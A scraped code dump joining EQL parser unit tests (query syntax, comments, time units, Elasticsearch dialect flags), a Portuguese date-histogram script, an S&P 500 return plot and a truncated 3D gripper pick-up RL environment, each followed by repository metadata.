'sequence [process where process.name == "cmd.exe"] as a0 [network where a0.process.id == process.id]'
# sequence with negative missing events without maxspan
'sequence [process where true] ![file where true]',
# sequence with negative missing events without elasticsearch flag
'sequence with maxspan [process where true] ![file where true]',
]
for query in invalid:
self.assertRaises(EqlParseError, parse_query, query)
    def test_backtick_fields(self):
        """Test that backticks are accepted with fields."""
        def parse_to(text, path):
            # Parse, check the resolved path, then round-trip render+parse.
            node = parse_expression(text)
            self.assertIsInstance(node, Field)
            self.assertEqual(node.full_path, path)
            # now render back as text and parse again
            node2 = parse_expression(node.render())
            self.assertEqual(node2, node)
        parse_to("`foo-bar-baz`", ["foo-bar-baz"])
        parse_to("`foo bar baz`", ["foo bar baz"])
        parse_to("`foo.bar.baz`", ["foo.bar.baz"])
        parse_to("`foo`.`bar-baz`", ["foo", "bar-baz"])
        parse_to("`foo.bar-baz`", ["foo.bar-baz"])
        parse_to("`💩`", ["💩"])
        parse_to("`foo`[0]", ["foo", 0])
        parse_to("`foo`[0].`bar`", ["foo", 0, "bar"])
        # keywords (this is the `keywords` list imported from eql.parser):
        # backticks let reserved words be used as field names
        for keyword in keywords:
            parse_to("`{keyword}`".format(keyword=keyword), [keyword])
            parse_to("prefix.`{keyword}`".format(keyword=keyword), ["prefix", keyword])
            parse_to("`{keyword}`[0].suffix".format(keyword=keyword), [keyword, 0, "suffix"])
    def test_backtick_split_lines(self):
        """Confirm that backticks can't be split across lines."""
        with self.assertRaises(EqlSyntaxError):
            parse_expression("`abc \n def`")
    def test_query_events(self):
        """Test that event queries work with events[n].* syntax in pipes."""
        base_queries = ['abc', 'abc[123]', 'abc.def.ghi', 'abc.def[123].ghi[456]']
        # Bare fields and explicit events[0].* both resolve to event index 0.
        for text in base_queries:
            field_query = parse_expression(text) # type: Field
            events_query = parse_expression('events[0].' + text) # type: Field
            index, query = field_query.query_multiple_events()
            self.assertEqual(index, 0, "Didn't query from first event")
            self.assertEqual(query, field_query, "Didn't unconvert query")
            index, query = events_query.query_multiple_events()
            self.assertEqual(index, 0, "Didn't query from first event")
            self.assertEqual(query, field_query, "Didn't unconvert query")
        # Non-zero event indexes round-trip through query_multiple_events().
        for event_index, text in enumerate(base_queries):
            events_text = 'events[{}].{}'.format(event_index, text)
            field_query = parse_expression(text) # type: Field
            events_query = parse_expression(events_text) # type: Field
            index, query = events_query.query_multiple_events()
            self.assertEqual(index, event_index, "Didn't query from {} event".format(event_index))
            self.assertEqual(query, field_query, "Didn't unconvert query")
    def test_comments(self):
        """Test that comments are valid syntax but stripped from AST."""
        # Each commented/whitespace variant must equal the plain parse.
        match = parse_query("process where pid=4 and ppid=0")
        query = parse_query("""process where pid = 4 /* multi\nline\ncomment */ and ppid=0""")
        self.assertEqual(match, query)
        query = parse_query("""process where pid = 4 // something \n and ppid=0""")
        self.assertEqual(match, query)
        query = parse_query("""process where pid
            = 4 and ppid=0
        """)
        self.assertEqual(match, query)
        query = parse_query("""process where
            // test
            //
            //line
            //comments
            pid = 4 and ppid = 0
            """)
        self.assertEqual(match, query)
        match = parse_expression("true")
        query = parse_expression("true // something else \r\n /* test\r\n something \r\n*/")
        self.assertEqual(match, query)
        # Comments are also stripped from macro definitions.
        commented = parse_definitions("macro test() pid = 4 and /* comment */ ppid = 0")
        macro = parse_definitions("macro test() pid = 4 and ppid = 0")
        self.assertEqual(commented, macro)
def test_float_time_unit(self):
"""Test that error messages are raised and formatted when time units are missing."""
def error(query, message):
with self.assertRaises(EqlSemanticError) as exc:
parse_query(query)
self.assertEqual(exc.exception.error_msg, message)
error("sequence with maxspan=0.150s [foo where true] [bar where true]",
"Only integer values allowed for maxspan. Did you mean 150ms?")
error("sequence with maxspan=1.6h [foo where true] [bar where true]",
"Only integer values allowed for maxspan.\nTry a more precise time unit: ms, s, m.")
error("sequence with maxspan=0.5ms [foo where true] [bar where true]",
"Only integer values allowed for maxspan.")
error("sequence with maxspan=0.5zz [foo where true] [bar where true]",
"Only integer values allowed for maxspan.")
    def test_invalid_comments(self):
        """Test that invalid/overlapping comments fail."""
        query_text = "process where /* something */ else */ true"
        self.assertRaises(EqlParseError, parse_query, query_text)
        # Test nested comments (not supported)
        query_text = "process where /* outer /* nested */ outer */ true"
        self.assertRaises(EqlParseError, parse_query, query_text)
        # A trailing line comment may not swallow the rest of the query.
        query_text = "process where // true"
        self.assertRaises(EqlParseError, parse_query, query_text)
    def test_invalid_time_unit(self):
        """Test the error message raised for unrecognized maxspan time units."""
        with self.assertRaisesRegex(EqlSemanticError, "Unknown time unit. Recognized units are: ms, s, m, h, d."):
            parse_query("sequence with maxspan=150 zz [foo where true] [bar where true]")
        # Long-form unit names are rejected too.
        with self.assertRaisesRegex(EqlSemanticError, "Unknown time unit. Recognized units are: ms, s, m, h, d."):
            parse_query("sequence with maxspan=150 hours [foo where true] [bar where true]")
    def test_method_syntax(self):
        """Test correct parsing and rendering of methods."""
        # Precedence: the method chain binds to the parenthesized group in
        # parse1, but only to `b` in parse2.
        parse1 = parse_expression("(a and b):concat():length()")
        parse2 = parse_expression("a and b:concat():length() > 0")
        self.assertNotEqual(parse1, parse2)
        class Unmethodize(DepthFirstWalker):
            """Strip out the method metadata, so its rendered directly as a node."""
            def _walk_function_call(self, node):
                node.as_method = False
                return node
        # With method metadata removed, the AST equals the plain nested-call form.
        without_method = Unmethodize().walk(parse1)
        expected = parse_expression("length(concat(a and b))")
        self.assertEqual(parse1, parse_expression("(a and b):concat():length()"))
        self.assertIsNot(parse1, without_method)
        self.assertEqual(without_method, expected)
    def test_missing_time_unit(self):
        """Test the error message raised when a maxspan value has no time unit."""
        with self.assertRaisesRegex(EqlSemanticError, "Missing time unit. Did you mean 150s?"):
            parse_query("sequence with maxspan=150 [foo where true] [bar where true]")
    def test_term_extraction(self):
        """Test that EQL terms are correctly extracted."""
        process_event = """
        process where process_name == "net.exe" and child of [
            network where destination_port == 443
        ]
        """
        file_event = "file where false"
        network_event = " network where\n\n\n\n destination_address='1.2.3.4'\n\t and destination_port == 8443"
        sequence_template = "sequence with maxspan=10m [{}] by field1, field2, [{}] by field2, field3 [{}] by f4, f5"
        join_template = "join [{}] by a [{}] by b [{}] by c until [dns where false] by d"
        # basic sequence with by
        terms = [process_event, network_event, file_event]
        stripped = [t.strip() for t in terms]
        sequence_extracted = extract_query_terms(sequence_template.format(*terms))
        self.assertListEqual(sequence_extracted, stripped)
        # sequence with by and pipes
        terms = [network_event, process_event, process_event]
        stripped = [t.strip() for t in terms]
        sequence_extracted = extract_query_terms(sequence_template.format(*terms) + "| head 100 | tail 10")
        self.assertListEqual(sequence_extracted, stripped)
        # join with by
        terms = [network_event, process_event, process_event]
        stripped = [t.strip() for t in terms]
        join_extracted = extract_query_terms(join_template.format(*terms))
        self.assertListEqual(join_extracted, stripped)
        # simple query without pipes
        simple_extracted = extract_query_terms(network_event)
        self.assertListEqual(simple_extracted, [network_event.strip()])
        # simple query with pipes
        simple_extracted = extract_query_terms(network_event + "| unique process_name, user_name\n\n| tail 10")
        self.assertListEqual(simple_extracted, [network_event.strip()])
def test_unicode_escape(self):
"""Confirm that u{...} escapes are interpreted properly."""
self.assertEqual(String("just A here"), parse_expression('"just \\u{41} here"'))
self.assertEqual(String("just A here"), parse_expression('"just \\u{041} here"'))
self.assertEqual(String("just A here"), parse_expression('"just \\u{0041} here"'))
self.assertEqual(String("just \u0407 here"), parse_expression('"just \\u{407} here"'))
self.assertEqual(String("just \U0001F4A9 here"), parse_expression('"just \\u{1F4A9} here"'))
self.assertEqual(String("just \U0001F4A9 here"), parse_expression('"just \\u{001F4A9} here"'))
with self.assertRaises(EqlParseError):
parse_expression('"just \\u{0} here"')
parse_expression('"just \\u{1} here"')
parse_expression('"just \\u{0000001F4A9} here"')
    def test_elasticsearch_flag(self):
        """Check that removed Endgame syntax throws an error and new syntax does not."""
        # Shared schema used by both the Elasticsearch-flavored and the
        # legacy-syntax sections below.
        schema = Schema({
            "process": {
                "process_name": "string",
                "pid": "number",
                "string_array": ["string"],
                "obj_array": [{"trusted": "boolean"}],
                "opcode": "number",
                "process": {"name": "string"},
                "unique_pid": "string",
                "user": {"name": "string"},
                "field1": {"nested_field": "string", "nested_field2": "string"},
            },
            "file": {
                "opcode": "number",
                "unique_pid": "string"
            },
            "network": {
                "process": {"name": "string"},
                "user": {"name": "string"}
            }
        })
        # --- `with runs=N` repetition on sequence subqueries ---------------
        with elasticsearch_syntax, allow_runs:
            subquery1 = '[process where opcode == 1] by unique_pid'
            runs = [2, 10, 30]
            for run in runs:
                subquery2_runs = '[file where opcode == 0] by unique_pid with runs={}'.format(run)
                parse_query('sequence {} {}'.format(subquery1, subquery2_runs))
            # runs is rejected on `until`, and run counts < 2 are invalid
            self.assertRaises(EqlSyntaxError, parse_query,
                              'sequence [file where true] by field until [file where true] with runs=2')
            self.assertRaises(EqlSemanticError, parse_query, 'sequence [process where opcode == 1] with runs=0')
            self.assertRaises(EqlSyntaxError, parse_query, 'sequence [process where opcode == 1] with runs=-1')
            self.assertRaises(EqlSemanticError, parse_query, 'sequence [process where opcode == 1] with runs=1')
            # ensure runs feature is building subqueries correctly (even on first subquery)
            ast = parse_query('sequence [process where process.name != null] with runs=3')
            self.assertEqual(len(ast.first.queries), 3)
            ast = parse_query('sequence [process where process.name != null]')
            self.assertEqual(len(ast.first.queries), 1)
        # --- Elasticsearch syntax: `:`/`like`/`regex`, triple quotes, `~` --
        with elasticsearch_syntax, schema:
            parse_query('process where process_name : "cmd.exe"')
            parse_query('process where process_name : """cmd.exe"""')
            parse_query('process where process_name : """""cmd.exe"""""')
            parse_query('process where process_name : ("cmd*.exe", "foo*.exe")')
            parse_query('process where process_name : ("cmd*.exe", """foo*.exe""")')
            parse_query('process where process_name in~ ("cmd.exe", """foo.exe""")')
            parse_query('process where process_name in ("cmd.exe", """foo.exe""")')
            parse_query('process where process_name like ("cmd*.exe", """foo*.exe""")')
            parse_query('process where process_name like~ ("cmd*.exe", """foo*.exe""")')
            parse_query('process where process_name regex ("cmd*.exe", """foo*.exe""")')
            parse_query('process where process_name regex~ ("""cmd.*\\.exe""", """foo.*\\.exe""")')
            parse_query("process where startsWith(process_name, \"cmd.exe\")")
            parse_query("process where startsWith~(process_name, \"cmd.exe\")")
            # $variable syntax belongs to the endpoint dialect, not this one
            self.assertRaises(EqlSyntaxError, parse_query, "process where $variable")
            self.assertRaises(EqlSyntaxError, parse_query,
                              'process where _arraysearch(process.args, $variable, $variable == "foo"')
            # invalid syntax, because the right side should be a string literal or list of literals
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : length()")
            self.assertRaises(EqlSemanticError, parse_query, "process where pid : 1")
            self.assertRaises(EqlSemanticError, parse_query, "process where pid like 1")
            self.assertRaises(EqlSemanticError, parse_query, "process where pid regex 1")
            self.assertRaises(EqlSemanticError, parse_query, "process where pid like~ 1")
            self.assertRaises(EqlSemanticError, parse_query, "process where pid regex~ 1")
            # single `=` and single-quoted strings were removed in this dialect
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name = \"cmd.exe\"")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == 'cmd.exe'")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == ?'cmd.exe'")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == ?\"cmd.exe\"")
            # optional fields in the schema
            parse_query('process where ?process.name : "cmd.exe"')
            parse_query('process where ?process_name : "cmd.exe"')
            # optional fields not in the schema
            parse_query('process where ?unknown_field : "cmd.exe"')
            parse_query('process where ?unknown.field : "cmd.exe"')
            # with strict validation, unknown optional fields become errors
            with elasticsearch_validate_optional_fields:
                self.assertRaises(EqlSemanticError, parse_query, 'process where ?unknown_field : "cmd.exe"')
                self.assertRaises(EqlSemanticError, parse_query, 'process where ?unknown.field : "cmd.exe"')
                # optional fields in the schema
                parse_query('process where ?process.name : "cmd.exe"')
                parse_query('process where ?process_name : "cmd.exe"')
            # sample base query usage
            with allow_sample:
                parse_query('sample by user [process where opcode == 1] [process where opcode == 1]')
            # invalid sample base query usage
            self.assertRaises(EqlSemanticError, parse_query,
                              'sample by user [process where opcode == 1] [process where opcode == 1]')
            self.assertRaises(EqlSemanticError, parse_query,
                              'sample by user [process where opcode == 1] ![process where opcode == 1]')
        # --- Negated (!) sequence subqueries -------------------------------
        with elasticsearch_syntax, allow_negation:
            parse_query('sequence with maxspan=2s [process where true] ![file where true]')
            parse_query('sequence with maxspan=2s ![process where true] [file where true]')
            parse_query('sequence with maxspan=2s [process where true] ![file where true] [file where true]')
            # negation requires maxspan, and is not allowed in join/sample
            self.assertRaises(EqlSemanticError, parse_query,
                              'sequence [process where true] [file where true] ![file where true]')
            self.assertRaises(EqlSemanticError, parse_query,
                              'join ![process where true] [file where true] [file where true]')
            self.assertRaises(EqlSemanticError, parse_query,
                              'sample ![process where true] [file where true] [file where true]')
        # --- Legacy syntax: the Elasticsearch-only forms must now fail -----
        with schema:
            parse_query("process where process_name == 'cmd.exe'")
            parse_query("process where process_name == ?'cmd.exe'")
            parse_query("process where process_name == ?\"cmd.exe\"")
            parse_query("process where startsWith(process_name, \"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : length()")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like length()")
            self.assertRaises(EqlSyntaxError, parse_query, 'process where process_name == """cmd.exe"""')
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : \"cmd.exe\"")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : length()")
            self.assertRaises(EqlSyntaxError, parse_query, 'process where process_name == """cmd.exe"""')
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name in~ (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like \"cmd.exe\"")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like~ \"cmd.exe\"")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like~ (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex~ (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex \"cmd.exe\"")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex~ \"cmd.exe\"")
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex~ (\"cmd.exe\")")
            self.assertRaises(EqlSyntaxError, parse_query, "process where startsWith~(process_name, \"cmd.exe\")")
            # optional fields in the schema
            self.assertRaises(EqlSyntaxError, parse_query, 'process where ?process.name : "cmd.exe"')
            self.assertRaises(EqlSyntaxError, parse_query, 'process where ?process_name : "cmd.exe"')
            # optional fields not in the schema
            self.assertRaises(EqlSyntaxError, parse_query, 'process where ?unknown_field : "cmd.exe"')
            self.assertRaises(EqlSyntaxError, parse_query, 'process where ?unknown.field : "cmd.exe"')
            # `with runs=` is Elasticsearch-only syntax as well
            subquery1 = '[process where opcode == 1] by unique_pid'
            runs = [-1, 0, 1, 2, 10, 30]
            for run in runs:
                subquery2_runs = '[file where opcode == 0] by unique_pid with runs={}'.format(run)
                self.assertRaises(EqlSyntaxError, parse_query, 'sequence {} {}'.format(subquery1, subquery2_runs))
        # --- Endpoint dialect: $variables and sequence aliases -------------
        with elastic_endpoint_syntax, schema, ignore_missing_functions:
            # check elasticsearch-isms
            parse_query('process where process_name : ("cmd*.exe", "foo*.exe")')
            # support $variable syntax
            parse_query('process where arraySearch(string_array, $variable, $variable == "foo")')
            parse_query('process where arraySearch(obj_array, $sig, $sig.trusted == true)')
            # support sequence alias
            event0 = '[process where process.name == "abc.exe"]'
            event1 = '[network where p0.process.name == process.name]'
            event2 = '[network where p0.pid == 0]'
            event3 = '[network where p0.badfield == 0]'
            event4 = '!%s' % (event0)
            parse_query('sequence %s as p0 %s' % (event0, event1))
            parse_query('sequence by user.name %s as p0 %s' % (event0, event1))
            parse_query('sequence with maxspan=1m %s by user.name as p0 %s by user.name' % (event0, event1))
            parse_query('sequence by user.name %s as p0 %s' % (event0, event2))
            # aliases must resolve to a declared name with a valid field
            self.assertRaises(EqlSchemaError, parse_query, 'sequence by user.name %s as p1 %s' % (event0, event2))
            self.assertRaises(EqlSchemaError, parse_query, 'sequence by user.name %s as p1 %s' % (event0, event3))
            self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == 'cmd.exe'")
            # negative runs not supported on the endpoint
            self.assertRaises(EqlSemanticError, parse_query, 'sequence %s %s' % (event0, event4))
            # as fields not emmitted by the endpoint
            self.assertRaises(EqlSyntaxError, parse_query, 'process where client.as.organization.name == "string"')
            self.assertRaises(EqlSyntaxError, parse_query, 'process where destination.as.organization.name == "string"')
def test_nested_fields(self):
"""Test nested fields."""
schema = Schema({
"process": {
"process_name": "string",
"pid": "number",
"string_array": ["string"],
"obj_array": ["string"],
"opcode": "number",
"process": {"name": "string"},
"unique_pid": "string",
"user": {"name": "string"},
"field": {"nested_field": [{"nf1": "string", "nf2": "number"}]},
},
"file": {
"opcode": "number",
"unique_pid": "string"
},
"network": {
"process": {"name": "string"},
"user": {"name": "string"}
}
})
with elastic_endpoint_syntax, schema:
# should fail since nf1 type is a string
self.assertRaises(EqlTypeMismatchError, parse_query,
'process where arraySearch(field.nested_field, $var, $var.nf1 == 3)')
# should fail since nf4 doesn't exist
self.assertRaises(EqlSchemaError, parse_query,
'process where arraySearch(field.nested_field, $var, $var.nf4 == "3")')
# should fail since the second $ is missing
self.assertRaises(EqlSchemaError, parse_query,
'process where arraySearch(field.nested_field, $var, var.nf2 == 3)')
parse_query('process where arraySearch(field.nested_field, $var, $var.nf1 == "three")')
parse_query('process where arraySearch(field.nested_field, $var, $var.nf2 == 3)')
| endgameinc/eql | tests/test_parser.py | test_parser.py | py | 39,771 | python | en | code | 203 | github-code | 13 |
41410155928 | #import pandas as pd
import matplotlib.pyplot as plt
def bubbleSort(lista, listaCount):
    """Sort ``lista`` in ascending numeric order, in place, applying the same
    swaps to ``listaCount`` so each count stays aligned with its value.

    ``lista`` holds numeric strings; comparisons use their integer value.
    Returns the (mutated) pair ``(lista, listaCount)``.
    """
    for i in range(len(lista)):
        for j in range(len(lista)):
            # Exchange sort: swap both lists in lockstep whenever the element
            # at i is numerically smaller than the one at j.  O(n^2), which is
            # fine for the small histogram lists this script builds.  The
            # original wrapped every index in a redundant int() even though
            # range() already yields ints.
            if int(lista[i]) < int(lista[j]):
                lista[i], lista[j] = lista[j], lista[i]
                listaCount[i], listaCount[j] = listaCount[j], listaCount[i]
    return (lista, listaCount)
def listaCounter(listas):
    """Count occurrences of each distinct value in ``listas``.

    Returns ``(values, counts)`` where ``values`` are the distinct numeric
    strings sorted ascending by integer value and ``counts[i]`` is how many
    times ``values[i]`` appeared.
    """
    # A single dict pass replaces the original O(n^2) `in` / index() lookups;
    # sorting by int value reproduces the order bubbleSort() produced.
    counts = {}
    for item in listas:
        counts[item] = counts.get(item, 0) + 1
    ordered = sorted(counts, key=int)
    return (ordered, [counts[value] for value in ordered])
filename = r"exercicioedjalma.csv"
# Reads the csv into a dataframe and converts it to a dictionary (Pandas)
'''df = pd.read_csv(filename)
dicionario = df.to_dict()'''
# Collects every date into a single list (Pandas variant, disabled)
'''datas = []
for i in dicionario.keys():
    datas.append(i)
    for j in dicionario[i].values():
        datas.append(j)'''
# Stores the lines/dates of the file in a list
datas = []
with open(filename, 'rt+') as arq:
    for i in arq:
        datas.append(i)
# Splits each date ("dd/mm/yyyy") and stores the parts in their own lists.
# Leading zeros are stripped so '01' and '1' count as the same value.
# NOTE(review): each year keeps the trailing newline read from the file;
# int() tolerates it during sorting, but it leaks into the plot labels.
anos = []
meses = []
dias = []
for data in datas:
    data = data.split('/')
    if data[0][0] == '0':
        data[0] = data[0][1:]
    if data[1][0] == '0':
        data[1] = data[1][1:]
    dias.append(data[0])
    meses.append(data[1])
    anos.append(data[2])
# Stores the days and their respective counts in two lists (inlined variant,
# superseded by listaCounter below)
'''dia = []
diaCount = []
for i in dias:
    if i not in dia:
        dia.append(i)
        diaCount.append(1)
        continue
    diaCount[dia.index(i)] += 1
dia, diaCount = bubbleSort(dia, diaCount)'''
dia, diaCount = listaCounter(dias)
mes, mesCount = listaCounter(meses)
ano, anoCount = listaCounter(anos)
# Stores the months and their respective counts in two lists (disabled)
'''mes = []
mesCount = []
for i in meses:
    if i not in mes:
        mes.append(i)
        mesCount.append(1)
        continue
    mesCount[mes.index(i)] += 1
mes, mesCount = bubbleSort(mes, mesCount)'''
# Stores the years and their respective counts in two lists (disabled)
'''ano = []
anoCount = []
for i in anos:
    if i not in ano:
        ano.append(i)
        anoCount.append(1)
        continue
    anoCount[ano.index(i)] += 1
ano, anoCount = bubbleSort(ano, anoCount)'''
# Plots the per-day histogram
with plt.style.context('Solarize_Light2'):
    plt.figure(figsize=(15, 5))
    plt.bar(dia, diaCount)
    plt.title('Quantidade de cada dia')
    plt.xlabel('Dias')
    plt.ylabel('Quantidade')
    plt.show()
# Plots the per-month histogram
with plt.style.context('Solarize_Light2'):
    plt.figure(figsize=(10, 5))
    plt.bar(mes, mesCount)
    plt.title('Quantidade de cada mês')
    plt.xlabel('Meses')
    plt.ylabel('Quantidade')
    plt.show()
# Plots the per-year histogram
with plt.style.context('Solarize_Light2'):
    plt.figure(figsize=(30, 5))
    plt.bar(ano, anoCount)
    plt.title('Quantidade de cada ano')
    plt.xlabel('Anos')
    plt.ylabel('Quantidade')
    plt.show()
| BrunoViotto18/Bosch | 1 - Python/Aula 76 - 20_12_2021 - REVISÃO PYTHON/Revisão - SemiCópia/ExercicioEdjalma.py | ExercicioEdjalma.py | py | 3,216 | python | pt | code | 0 | github-code | 13 |
5293963074 | import pickle
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
def plot_result(fin_data_df, titulo, columna, y_label, idx, per_long=730):
    """Plot `per_long` rows of column index `columna` against the 'Dates'
    column starting at row `idx`, save the figure under ./figures/ using
    `titulo` in the file name, then display and close it."""
    window = slice(idx, idx + per_long)
    dates = fin_data_df['Dates'][window]
    values = fin_data_df.iloc[window, columna]
    plt.figure(figsize=(8, 6))
    plt.plot(dates, values, label='Precio fin de día')
    plt.ylabel(y_label)
    plt.legend()
    plt.savefig("./figures/fig_S&P500_" + titulo)
    plt.show()
    plt.close()
idx_l = [2927, 7310, 4388, 6580]
#test_name_l = ['2008-2009', '2020-2021', '2012-2013', '2018-2019']
test_name_l = ['Rendimiento 2008-2009', 'Rendimiento 2020-2021', 'Rendimiento 2012-2013', 'Rendimiento 2018-2019']
# Raw string: "\d", "\c" and "\F" are invalid escape sequences in a normal
# literal (SyntaxWarning on recent Pythons); the r-prefix keeps the exact
# same path bytes without relying on that leniency.
fin_data_f = r".\data\csv\Financial Data.csv"
# Only the date and the S&P 500 close are needed.
fin_data_df = pd.read_csv(fin_data_f, parse_dates=['Dates'] ,usecols=lambda column: column == 'Dates' or column=='S&P 500')
for idx, test_name in zip(idx_l, test_name_l):
    # Rebase prices to 100 at row `idx`, then report the return 730 rows later.
    fin_data_df['Rendimiento S&P500'] = fin_data_df.loc[:]['S&P 500']/fin_data_df.loc[idx]['S&P 500']*100
    # plot_result(fin_data_df, test_name, 2, 'Rendimiento base 100', idx)
    print(f"periodo {test_name}, rendimiento {fin_data_df['Rendimiento S&P500'][idx+730]-100}")
| falamo1969/AgenteInversionTFM | graficos.py | graficos.py | py | 1,192 | python | en | code | 0 | github-code | 13 |
16007318470 | import torch
import numpy as np
import nimblephysics as nimble
from solver.envs.rigidbody3d.r3d_pickup import PickUp
from solver.train_rpg import Trainer
from solver.envs.rigidbody3d.hooks import print_gpu_usage, record_rollout
from solver.envs.rigidbody2d.hooks import save_traj
from solver.envs.rigidbody3d.utils import arr_to_str
class Pick3Cube(PickUp):
    """Pick-up task with a gripper arm and three spheres.

    Extends PickUp with per-joint action scaling and a shaped reward that
    first drives the gripper toward a target ball (with the pads facing
    down) and then pulls the ball to its goal position.
    """
    def __init__(self, cfg=None, pad_dir_weight=0.75):
        # pad_dir_weight scales the penalty that keeps the gripper pads
        # facing downward (see get_reward).
        super().__init__(
            cfg,
            dt=0.005, frame_skip=0, gravity=-1.0,
            cam_resolution=(512, 512),
            A_ACT_MUL=0.01, X_OBS_MUL=2.0, V_OBS_MUL=1.0
        )
        self.pad_dir_weight = pad_dir_weight
        # Per-joint action scaling for the 7-DoF arm; overrides the scalar
        # A_ACT_MUL passed to the base class above.
        self.A_ACT_MUL = torch.tensor(
            [1 / 200, 1 / 150, 1 / 100, 1 / 100, 1 / 100, 1 / 100, 1 / 100]
            # [1 / 200, 1 / 200, 1 / 200, 1 / 100, 1 / 200, 1 / 100, 1 / 100]
        )
    def init_simulator(self):
        """Load the arm, three spheres and the ground, restrict the action
        space to the arm's DoFs, and set up nimble FK mappings for the
        end-effector and the two gripper pads."""
        # arm
        self.sim.arm = self.sim.load_urdf(
            "gripper_v2.urdf",
            restitution_coeff=self.restitution_coeff,
            friction_coeff=self.friction_coeff,
            mass=1)
        # boxes
        self.sim.box = [
            self.sim.load_urdf(
                "sphere.urdf",
                restitution_coeff=self.restitution_coeff,
                friction_coeff=self.friction_coeff,
                mass=0.1, inertia=[0.1, 0.1, 0.1]),
            self.sim.load_urdf(
                "sphere.urdf",
                restitution_coeff=self.restitution_coeff,
                friction_coeff=self.friction_coeff,
                mass=0.1, inertia=[0.1, 0.1, 0.1]),
            self.sim.load_urdf(
                "sphere.urdf",
                restitution_coeff=self.restitution_coeff,
                friction_coeff=self.friction_coeff,
                mass=0.1, inertia=[0.1, 0.1, 0.1])
        ]
        # ground
        self.sim.load_urdf(
            "ground.urdf",
            restitution_coeff=self.restitution_coeff,
            friction_coeff=self.friction_coeff)
        # action only control arm, not other objects
        for i in range(self.sim.arm.sapien_actor.dof, self.sim.world.getActionSize()):
            self.sim.world.removeDofFromActionSpace(i)
        # nimble arm forward kinematics
        self.sim.arm_fk = nimble.neural.IKMapping(self.sim.world)
        self.sim.arm_fk.addLinearBodyNode(self.sim.arm.nimble_actor.getBodyNode("end_effector"))
        # nimble pad forward kinematics
        self.sim.pad_fk = nimble.neural.IKMapping(self.sim.world)
        self.sim.pad_fk.addLinearBodyNode(self.sim.arm.nimble_actor.getBodyNode("left_pad"))
        self.sim.pad_fk.addLinearBodyNode(self.sim.arm.nimble_actor.getBodyNode("right_pad"))
    def sample_state_goal(self, batch_size=1):
        """Return the fixed initial state (arm qpos, 3 box poses, zero
        velocities) and the three goal positions — this task does not
        randomize, so batch_size is ignored."""
        box_x = 0.4
        box_y = (1 - box_x ** 2) ** 0.5
        state = torch.tensor(
            [
                # arm qpos
                -1.57 / 2 - 0.2, 0.7, -0.7, -0.2, 2.22, 0, 0,
                0, 0, 0, 0, -0.399, 1.0,# -1.5,
                0, 0, 0, box_y, -0.399, 1.0,# -(1.65 - box_x),
                0, 0, 0, -box_y, -0.399, 1.0,# -(1.65 - box_x),
                # 0, 0, 0, 0, -0.399, 0,
                # 0, 0, 0, 0, -0.399, box_y,
                # 0, 0, 0, 0, -0.399, -box_y,
                # velocities
                0, 0, 0, 0, 0, 0, 0,
                0, 0, 0, 0, 0, 0,
                0, 0, 0, 0, 0, 0,
                0, 0, 0, 0, 0, 0,
            ]
        )
        goals = torch.tensor(
            [
                0, 0.4, 1.0,
                box_y, 0.4, 1.0,
                -box_y, 0.4, 1.0,
            ]
        )
        return state, goals
    def get_reward(self, s, a, s_next):
        """Shaped reward: reach phase for t < 50, then pull-to-goal phase.

        Returns a dict of named reward terms (presumably summed by the
        caller — TODO confirm in the base class).
        """
        # pos of boxes
        boxes_s_next = torch.stack([
            self.box_pos(s_next, i)
            for i in range(len(self.sim.box))
        ])
        # ee pos
        # ee_s_next = nimble.map_to_pos(self.sim.world, self.sim.arm_fk, s_next) \
        #     + torch.tensor([0, -0.4, 0])
        # Midpoint of the two gripper pads, shifted down by 0.2.
        ee_s_next = nimble.map_to_pos(self.sim.world, self.sim.pad_fk, s_next).view(-1, 3).mean(dim=0)\
            + torch.tensor([0, -0.2, 0])
        # select closest box
        # boxi = (ee_s_next - boxes_s_next).norm(dim=1).min(dim=0)[1]
        # NOTE(review): closest-box selection is disabled; box 0 is always
        # the target.
        boxi = 0
        self.text += f"\naction: {arr_to_str(a * self.A_ACT_MUL)}"
        self.text += f"\nselected box: {boxi}"
        box_s_next = boxes_s_next[boxi]
        goal = self.goals.view(-1, 3)[boxi]
        # pad facing
        # Angle of the pad relative to straight-down, derived from the first
        # arm joints — presumably joints 0-2 minus joint 4; TODO confirm the
        # kinematic chain in gripper_v2.urdf.
        pad_angle = -(s[:3].sum() - s[4]) - np.pi
        self.text += f"\npad angle: {pad_angle}"
        self.text += f"\nee pos: {arr_to_str(ee_s_next.detach().numpy())}"
        # rewards
        # NOTE(review): reach_top is computed but never used below.
        reach_top = -(ee_s_next + torch.tensor([0, -0.2, 0]) - box_s_next).norm() ** 2
        reach = -(ee_s_next - box_s_next).norm() ** 2
        # gripper_facing = (pad_dir * ref_dir).sum() ** 2
        gripper_center_deviate = -(s_next[5] - s_next[6]) ** 2
        gripper_qpos_at_0 = -(s_next[5] ** 2 + s_next[6] ** 2)
        gripper_close = -((s_next[5] - 0.12) ** 2 + (s_next[6] - 0.12) ** 2)
        # Penalize the end-effector dipping below the ground clearance.
        gripper_ground_penalty = ((ee_s_next[1] - 0.2 + 0.4) < 0) * (-(ee_s_next[1] - 0.2 + 0.4) ** 2)
        if self.t < 50:
            # Phase 1: approach the box with open, centered, downward pads.
            res = dict(
